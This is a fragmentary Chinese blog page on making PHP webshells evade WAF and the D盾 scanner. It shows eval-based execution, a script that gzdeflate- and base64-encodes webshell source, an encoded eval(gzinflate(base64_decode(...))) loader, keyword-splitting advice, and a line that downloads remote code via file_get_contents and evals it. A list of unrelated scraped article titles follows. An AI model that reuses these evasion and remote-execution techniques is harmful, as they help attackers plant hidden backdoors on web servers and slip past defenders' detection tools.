Part 1 前言

Part 2 免杀

执行代码

eval 或 preg_replace的/e修饰符来执行大马代码。

$a = 'phpinfo();';eval($a);//eval执行php代码

编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。

eval_gzinflate_base64类型加密与解密:

http://www.zhuisu.net/tool/phpencode.php

https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php

自己写脚本加密:

$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大马源码路径

$encode = base64_encode(gzdeflate($code)); //加密函数自己修改就行

echo $encode; //输出加密后代码

解码

通过解码执行我们的代码。

eval(gzinflate(base64_decode('S03OyFdQ8shUKLbMTVOyBgA=')));?>

关键字免杀

//类型这样的关键字如果没有混淆拆分是过不了waf的

eval(gzinflate(base64_decode

//我们需要做的就是关键字免杀

免杀 payload

D盾

查杀

免杀远程执行 payload

$f = file_get_contents(PACK('H*',$$m));eval($f);

?>

免杀

远程下载 payload

免杀,D盾报了1级,可以完全免杀的,但是觉得没必要。

Part 3 总结

php超小免杀大马_php大马免杀技巧 | bypass waf相关推荐

  1. php大马免杀技巧 | bypass waf

    Part 1 前言 Part 2 免杀 执行代码 eval 或 preg_replace的/e修饰符来执行大马代码. $a = 'phpinfo();'; eval($a); //eval执行php代 ...

  2. 首款超小体积、免插卡、蓝牙配置的新款4G DTU来了!

    通讯终端作为物联网的核心部件,其表现直接关系到应用方案在市场中的整体竞争力.随着物联网应用大规模落地,物联网设备微型化.集成化趋势明显. 超小体积 以市场需求为驱动,有人物联网推出超小体积导轨式4G ...

  3. java大马后门_PHP大马后门分析

    PHP大马后门分析 PHP大马 PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能.网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就 ...

  4. 远控免杀专题(24)-CACTUSTORCH免杀

    转载:https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...

  5. 远控免杀专题(21)-HERCULES免杀

    转载:https://mp.weixin.qq.com/s/Rkr9lixzL4tiL89r10ndig 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...

  6. 远控免杀专题(16)-Unicorn免杀

    0x01 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...

  7. 在哪里买铁甲格斗机器人_铁甲雄心Ⅱ火了 优必选“超变铁甲”掀起闯关赢免单热潮...

    8月21日,优必选旗下智能编程教育机器人品牌Jimu Robot推出新品"超变铁甲".这款桌面轻格斗编程机器人借力<铁甲雄心Ⅱ>综艺IP,主打桌面竞技玩法,承接Robo ...

  8. 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  9. 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  10. 2022-2028全球与中国超小微型微动开关市场现状及未来发展趋势

    [报告篇幅]:112 [报告图表数]:159 [报告出版时间]:2022年3月 [报告出版机构]:简乐尚博(168Report)电子及半导体研究中心 报告摘要 根据简乐尚博(168Report))的统 ...

最新文章

  1. 关于使用strtok的一个小问题
  2. iOS 网络编程(二)UDP协议小结
  3. 牛客题霸 [矩阵乘法] C++题解/答案
  4. 简而言之,JUnit:单元测试断言
  5. 简单封装kafka相关的api
  6. sublime_text_2 注册
  7. GPS Programming Tips for Windows Mobile
  8. 【开发常识】手机号为什么要隐藏中间的四位数?
  9. PCB封装绘制时的摆放方向
  10. VMware安装苹果系统
  11. 不要小看了互联网智能锁,它正撬动整个多元化居住产品时代!
  12. vue 点击按钮实现随机颜色
  13. Ubantu 一条命令安装宝塔
  14. H5 架构和原生架构的区别
  15. Leetcode动态规划部分典型题目分类及总结
  16. 七零年代摄影师Robert Mapplethorpe
  17. 十年一顾, iOS 与 Android 这样改变了我们
  18. jaeger链路追踪php,使用 Jaeger 完成服务间的链路追踪
  19. C语言自定义类型的介绍(结构体,枚举,联合体,位段)
  20. 双电阻差分电流采样_合金采样电阻的特点及作用

热门文章

  1. 一款医疗设备用超高耐压的千兆单口网络变压器H82407SG
  2. 基于PHP图书馆图书借阅管理系统
  3. ThinkPHP商城分类无限分类遍历数据
  4. Highcharts 隐藏右下角的官网链接
  5. V-Rep机器人仿真软件模型导入部分
  6. 并发网站压力测试工具
  7. 在安装VC2012上再安装VC2010时连接出错解决
  8. spreadJS初体验
  9. 怎样无损调整分区大小和扩容分区?
  10. 使用ApiPost按顺序传参及测试多个接口